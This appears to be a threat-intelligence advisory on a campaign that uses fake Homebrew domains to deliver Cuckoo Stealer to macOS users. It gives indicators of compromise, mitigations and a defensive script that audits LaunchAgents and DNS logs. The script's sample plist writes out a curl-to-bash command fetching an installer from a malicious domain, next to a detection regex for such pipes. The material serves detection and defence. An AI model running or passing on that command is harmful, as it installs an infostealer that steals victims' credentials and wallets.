
Fake Homebrew Pages Deliver Cuckoo Stealer via ClickFix | macOS Threat Hunting Analysis

Severity: Medium
Published: Thu Feb 19 2026 (02/19/2026, 15:26:27 UTC)
Source: AlienVault OTX General

Description

A sophisticated malware campaign named ClickFix targets macOS users by leveraging typosquatted domains mimicking the Homebrew package manager. Victims are deceived into running malicious curl commands that install the Cuckoo Stealer infostealer. This malware establishes persistence via LaunchAgents, bypasses macOS Gatekeeper protections, and communicates with encrypted command-and-control servers. It systematically harvests sensitive data including browser credentials, cryptocurrency wallets, and system information. The campaign uses multiple coordinated domains hosted on shared IPs, indicating an evolving and organized threat. No authentication or elevated privileges are initially required, but user interaction is necessary to execute the malicious commands. The threat exploits user trust in command-line installation processes common among developers and power users. The campaign is currently assessed as medium severity due to its impact and attack vector. Organizations with macOS environments, especially those using Homebrew, are at risk.

AI-Powered Analysis

Last updated: 02/19/2026, 18:17:07 UTC

Technical Analysis

The ClickFix campaign is a targeted malware operation against macOS users that exploits typosquatting on domains resembling the legitimate Homebrew package manager website. Attackers register multiple lookalike domains such as homabrews.org, brewmacos.com, and brewsh.cx to trick users into downloading and executing malicious scripts via curl commands. Once executed, the payload deploys the Cuckoo Stealer malware, an infostealer designed to exfiltrate sensitive user data. Cuckoo Stealer achieves persistence by installing itself as a LaunchAgent, a common macOS persistence mechanism, so that it runs at login. It bypasses macOS Gatekeeper, which normally restricts execution of unauthorized software, likely through code-signing abuse or exploitation of system weaknesses. The malware communicates with its command-and-control (C2) servers over encrypted channels, which complicates detection and analysis. It targets a broad range of sensitive information, including browser-stored credentials, cryptocurrency wallet data, and detailed system information, enabling attackers to carry out credential theft, financial fraud, and further system compromise. The infrastructure supporting the campaign is spread across multiple domains hosted on shared IP addresses, suggesting a coordinated and adaptable threat actor. The attack relies heavily on social engineering, exploiting users' trust in Homebrew and command-line installation methods; it requires user interaction but no prior authentication or elevated privileges. Indicators of compromise include specific malicious domains, URLs, and file hashes associated with the campaign. The campaign is linked to CVE-2026-25253, though no known exploits in the wild have been reported. The medium severity rating reflects the balance between the significant data exfiltration potential and the requirement that the user execute the malicious commands.

Potential Impact

This threat poses a significant risk to organizations and individuals using macOS systems, particularly those who rely on Homebrew for software installation. The exfiltration of browser credentials and cryptocurrency wallets can lead to financial losses, unauthorized access to corporate and personal accounts, and identity theft. The persistence mechanism allows long-term unauthorized access, increasing the risk of further exploitation or lateral movement within networks. The bypass of Gatekeeper reduces the effectiveness of built-in macOS security controls, potentially undermining user trust in system protections. Organizations with developers, IT staff, or power users who frequently use command-line tools are especially vulnerable. The campaign’s use of typosquatted domains increases the likelihood of accidental infection. The encrypted C2 communication complicates network detection and response efforts. While no widespread exploits are reported yet, the evolving infrastructure suggests ongoing active development and potential for escalation. The overall impact includes compromised confidentiality, integrity, and availability of sensitive data and systems, with potential reputational damage and regulatory consequences for affected organizations.

Mitigation Recommendations

Organizations should educate macOS users, especially developers and IT personnel, about the risks of executing commands from untrusted sources and the dangers of typosquatted domains. Implement strict policies to verify URLs and scripts before execution, including using official Homebrew installation instructions from verified sources. Employ endpoint detection and response (EDR) solutions capable of detecting persistence mechanisms such as LaunchAgents and anomalous network communications. Monitor DNS queries and network traffic for connections to the known malicious domains and IP addresses associated with this campaign. Use application allowlisting and macOS security features such as System Integrity Protection (SIP) and notarization enforcement to limit unauthorized software execution. Regularly audit installed LaunchAgents and running processes for suspicious entries. Deploy network security controls to inspect and block encrypted C2 traffic where possible, using SSL/TLS inspection with appropriate privacy considerations. Encourage multi-factor authentication (MFA) on critical accounts to limit the impact of credential theft. Maintain up-to-date backups and incident response plans tailored to macOS environments. Track threat intelligence feeds for updates on this campaign and related indicators to enable timely detection and response.
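Two of the recommendations above, auditing LaunchAgents for suspicious entries and matching DNS queries against the campaign's indicator domains, can be scripted. The following is an added example written for this page; it is not code from the page, AlienVault, or Hunt.io. The indicator domains are taken from the Indicators of Compromise section below; the LaunchAgent plists, their labels and paths, and the DNS log format are constructed for the example. It flags an agent that references an indicator domain, pipes a download straight into a shell, or executes from a temporary directory, and it reports DNS queries for an indicator domain or any of its subdomains.

```python
"""Defender-side checks for the fake-Homebrew / Cuckoo Stealer campaign:
audit LaunchAgent plists and scan DNS query logs against the indicator
domains listed on this page. Added example; not code from the page,
AlienVault or Hunt.io. All plist and log samples are constructed."""
import plistlib
import re
from typing import Optional

# Indicator domains copied from the page's Indicators of Compromise section,
# sorted longest first so the most specific indicator wins on subdomain matches.
IOC_DOMAINS = sorted({
    "brew.lat", "brewmacos.com", "brewsh.cx", "brewshh.org", "brrewsh.org",
    "homabrews.org", "raw.brewsh.cx", "raw.homabrews.org", "www.nitrogen.lol",
}, key=len, reverse=True)

# "curl ... | sh" style one-liners inside a persistence entry: the delivery
# pattern the analysis describes (curl commands plus LaunchAgent persistence).
CURL_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(/bin/)?(ba|z)?sh\b")
HOSTNAME_TOKEN = re.compile(r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
# Directories a login item should normally not execute from.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")


def matches_ioc_domain(name: str) -> Optional[str]:
    """Return the indicator that `name` equals or is a subdomain of, else None."""
    name = name.rstrip(".").lower()
    for dom in IOC_DOMAINS:
        if name == dom or name.endswith("." + dom):
            return dom
    return None


def audit_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one LaunchAgent plist and report why it looks suspicious, if at all."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or []
    if isinstance(args, str):
        args = [args]
    program = plist.get("Program")
    parts = ([program] if program else []) + list(args)
    command = " ".join(parts)
    findings, seen = [], set()
    for token in HOSTNAME_TOKEN.findall(command):
        hit = matches_ioc_domain(token)
        if hit and hit not in seen:
            seen.add(hit)
            findings.append(f"references indicator domain {hit}")
    if CURL_TO_SHELL.search(command):
        findings.append("pipes a download straight into a shell")
    if parts and parts[0].startswith(TEMP_DIRS):
        findings.append(f"executable lives in a temporary directory: {parts[0]}")
    return {"label": plist.get("Label", "<no label>"), "command": command,
            "findings": findings}


def scan_dns_log(lines) -> list:
    """Return (line_no, queried_name, indicator) for each query hitting an IoC domain.
    Assumes a constructed one-query-per-line format with a 'query=<name>' field."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r"query=(\S+)", line)
        if m:
            hit = matches_ioc_domain(m.group(1))
            if hit:
                hits.append((n, m.group(1).rstrip("."), hit))
    return hits


# Constructed samples: labels, paths and the log format are made up for this example.
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/sh", "-c",
        "curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh | bash"],
    "RunAtLoad": True,
})
TEMP_PLIST = plistlib.dumps({
    "Label": "com.example.helper", "Program": "/private/tmp/.update", "RunAtLoad": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"], "RunAtLoad": True,
})
DNS_LOG = [
    "2026-02-19T15:20:01Z client=10.0.0.12 query=github.com type=A",
    "2026-02-19T15:26:27Z client=10.0.0.12 query=raw.homabrews.org. type=A",
    "2026-02-19T15:26:31Z client=10.0.0.12 query=cdn.brewsh.cx type=AAAA",
    "2026-02-19T15:27:02Z client=10.0.0.40 query=brew.sh type=A",
]

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT_PLIST), ("temp", TEMP_PLIST), ("benign", BENIGN_PLIST)):
        result = audit_launch_agent(blob)
        print(name, result["label"], result["findings"] or "clean")
    for hit in scan_dns_log(DNS_LOG):
        print("DNS hit on line %d: %s -> %s" % hit)
```

On a real host, feed `audit_launch_agent` the contents of each `*.plist` under `~/Library/LaunchAgents` and `/Library/LaunchAgents`; the domain list is the part to keep current from the threat feed. Note that the legitimate `brew.sh` query in the sample is not flagged, since matching is by exact name or subdomain of an indicator, not by substring.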


Technical Details

Author: AlienVault
TLP: white
References: https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos
Adversary: null
Pulse Id: 69972ba35a28ae9de06a7308
Threat Score: null

Indicators of Compromise

CVE

CVE-2026-25253

Hashes (SHA-256)

545dd5cba264bf242bc837330ca34247e202f7ac25f03eec63bf5842357519f1
f985cd667c77e7d99c1ac2ea9cb0861ded15e1c2d44e480cbd178ca8b2caae42

URLs

https://homabrews.org/brewinstaller
https://raw.homabrews.org/Homebrew/install/HEAD/install.sh

Domains

brew.lat
brewmacos.com
brewsh.cx
brewshh.org
brrewsh.org
homabrews.org
raw.brewsh.cx
raw.homabrews.org
www.nitrogen.lol

Threat ID: 69974fe8d7880ec89b065bd4

Added to database: 2/19/2026, 6:01:12 PM

Last enriched: 2/19/2026, 6:17:07 PM

Last updated: 2/19/2026, 8:35:35 PM
